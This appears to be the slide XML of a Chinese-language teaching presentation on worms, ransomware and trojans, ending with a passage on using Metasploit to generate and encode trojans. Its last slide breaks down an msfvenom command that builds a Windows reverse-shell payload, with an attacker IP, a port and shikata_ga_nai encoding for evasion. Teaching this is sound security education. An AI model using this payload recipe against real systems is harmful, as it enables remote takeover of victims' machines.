                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“酸狐狸”漏洞攻击武器平台技术分析报告</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>》</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>《</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“NOPEN”远控木马分析报告</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>》</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346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蠕虫传播的工作流程</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="188423" name="Object 6"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3050540" y="1398270"/>
          <a:ext cx="7691120" cy="4530725"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj r:id="rId3" imgW="4119880" imgH="2427605" progId="Visio.Drawing.11">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj r:id="rId3" imgW="4119880" imgH="2427605" progId="Visio.Drawing.11">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 3077"/>
                      <p:cNvPicPr/>
                      <p:nvPr/>
                    </p:nvPicPr>
                    <p:blipFill>
                      <a:blip r:embed="rId4"/>
                      <a:srcRect/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </p:blipFill>
                    <p:spPr>
                      <a:xfrm>
                        <a:off x="3050540" y="1398270"/>
                        <a:ext cx="7691120" cy="4530725"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln w="38100">
                        <a:miter/>
                      </a:ln>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1927860" y="937895"/>
            <a:ext cx="9936480" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>蠕虫程序的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>工作流程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可以分为漏洞扫描、攻击、传染、现场处理四个阶段</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6283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蠕虫案例</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勒索病毒</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1927860" y="781685"/>
            <a:ext cx="9747250" cy="5737860"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>勒索病毒分析报告https://blog.csdn.net/w_g3366/article/details/100590112</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>Radamant勒索病毒分析</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>https://bbs.pediy.com/thread-256302.htm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>GlobeImposter勒索病毒技术分析报告</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>https://www.freebuf.com/articles/network/163792.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>GandCrab勒索病毒分析处置手册</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>http://blog.nsfocus.net/gandcrab-ransomware-handbook/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>tater勒索病毒分析</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>https://www.secpulse.com/archives/103133.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>“勒索病毒”深度分析报告http://www.huorong.cn/info/146173937921.html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9420" y="2610485"/>
            <a:ext cx="10482580" cy="1137285"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>木马（Trojan）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>泛滥时代（2005~2010）</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55651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木马名称的由来</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="488315" y="1570990"/>
            <a:ext cx="6010275" cy="3152775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7150100" y="1570990"/>
            <a:ext cx="4819650" cy="3152775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2334895" y="4862830"/>
            <a:ext cx="2316480" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>特洛伊木马战争</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8401685" y="4862830"/>
            <a:ext cx="1402080" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>木马病毒</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木马的定义和内涵</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2216150" y="1314450"/>
            <a:ext cx="9359900" cy="3784600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>主要特征是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>伪装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>成正常文件，类似于间谍特工，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>窃取数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>木马的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>作用范围</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是所有使用有木马的人在使用电脑时的资料。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>通常有两个可执行程序：一个是控制端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>（控制者）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，另一个是被控制端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>（被控制者）。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>注重对主机的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>控制，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>和运行的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>隐蔽性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>悄悄的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>窃取计算机数据，不会主动告诉你中木马了，需要自己去排查。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>不会自我繁殖，也并</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>不“刻意”地去感染</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>其他文件，它会修改注册表、驻留内存、在系统中安装后门程序、开机加载附带的木马。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>一般见到病毒名里有“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>”的就是“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>木马病毒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>”了。</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79525" y="781685"/>
            <a:ext cx="10040620" cy="5574665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7285990" y="6489700"/>
            <a:ext cx="4757420" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>《网络蠕虫的传播模型及检测技术研究》</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56083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网络蠕虫、计算机病毒和木马的区别</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621280" y="615950"/>
            <a:ext cx="7256780" cy="5744210"/>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87833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木马的种类</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6806565" y="781685"/>
            <a:ext cx="5170805" cy="706755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>破坏并删除文件，自动删除电脑上的dll、EXE等文件，以达到使被感染的电脑瘫痪的目的。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2606040" y="4175760"/>
            <a:ext cx="1402080" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>盗号密码</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39670" y="781685"/>
            <a:ext cx="8625205" cy="5499735"/>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53924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主流木马</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1849755" y="826135"/>
            <a:ext cx="9952990" cy="4884420"/>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55651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木马的工作原理</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361055" cy="501650"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0" algn="l"/>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matesploit</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生成木马</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1927860" y="781685"/>
            <a:ext cx="9986645" cy="1938020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>Metasploit是一款优秀的开源渗透测试框架平台，在该平台下可以方便的实施渗透测试；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>Meatsploit具有繁多的接口、模块等等，甚至允许用户自己编写自己的模块使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>在Metasploit框架下可以方便的实现木马的生成、捆绑、免杀。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="168275" y="2835910"/>
            <a:ext cx="11746230" cy="475615"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1696720" y="3311525"/>
            <a:ext cx="10217785" cy="2799715"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -p windows/shell_reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t> 意为使用shell_reverse_tcp攻击载荷</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LHOST=192.168.159.134 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>此步是设置攻击者IP地址</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LPORT=8080 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>此步是设置木马将会主动连接攻击者设定的监听端口</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x86/shikata_ga_nai </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>此步意为使用shikata_ga_nai的编码方式对攻击载荷进行重新编码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
